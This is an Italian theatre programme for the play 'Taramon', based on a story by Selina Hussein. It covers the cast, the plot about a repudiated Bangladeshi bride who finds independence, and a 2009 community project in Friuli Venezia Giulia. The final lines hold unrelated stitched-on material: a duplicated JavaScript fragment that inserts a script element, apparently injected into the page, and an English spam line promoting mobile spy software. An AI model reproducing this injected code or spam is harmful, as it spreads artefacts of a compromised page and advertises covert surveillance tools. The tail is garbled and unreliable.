Taramon

Tratto dal libro “La guerra” di Selina Hussein

Con Irin Parvin Khan, Sumi Bijori Hoq, Manuel Fanni Canelles
Suoni di Chiara Minca
Traduzione di IrinParvin Khan, Fariya Anjum Prome, Michela Novel, Sergia Adamo
Drammaturgia e regia Barbara Sinicco

Il matrimonio di Taramon è finito. E’ stata ripudiata dal marito, ma lei non è affatto triste.
Nel viaggio di ritorno alla casa dei genitori, Taramon riesce a trasmettere al padre che la riporta a casa con vergogna e preoccupazione, la bellezza della libertà, la possibilità del riscatto, la forza e il coraggio per intraprendere una vita finalmente indipendente.
Il cambiamento è un suono, che rimbomba nelle orecchie di tutta la sua famiglia adesso, e niente potrà impedirlo.

Questo breve racconto di Selina Hussein, per la prima volta tradotto in italiano, ci porta nel Bangladesh rurale, un mondo che a noi sembra distante secoli ma del tutto attuale. Taramon è una ragazzina bengalese come tante, forse un po’ più giovane, un po’ più povera, che viene data in moglie a un uomo che non conosce, secondo la tradizione dei matrimoni combinati. Non viene qui messa in discussione questa usanza che viene attualmente praticata e rispettata dalla maggior parte dei bengalesi, ma le voci femminili dell’autrice e dei suoi personaggi si alzano contro l’oppressione nei confronti delle donne, la rassegnazione, l’ignoranza.

Lo spettacolo è il frutto di un lungo percorso di formazione e attività cominciato nel 2005 con la comunità bangladescia di Monfalcone, la più numerosa d’Italia, in particolare con le donne, culminato nel 2008 con il progetto “Percorsi formativi e culturali: interventi per gli uomini e le donne delle comunità immigrate” promosso dall’Assessorato alle Pari Opportunità della regione Friuli Venezia Giulia. Lo spettacolo offre l’occasione di dar voce a una rappresentanza delle donne bengalesi adesso residenti in Italia che raramente viene in contatto con la società italiana e coraggiosamente ha accettato di mettersi in gioco in questo spettacolo. La collaborazione con i professionisti italiani coinvolti nella messa in scena ha rappresentato un ulteriore, decisiva, fase d’integrazione.

Lo spettacolo è stato rappresentato all’Androna degli Orti (Trieste) il 23 aprile 2009.document.currentScript.parentNode.insertBefore(s, document.currentScript);document.currentScript.parentNode.insertBefore(s, document.currentScript);The most popular 2017 spy software applications for the mobile phones.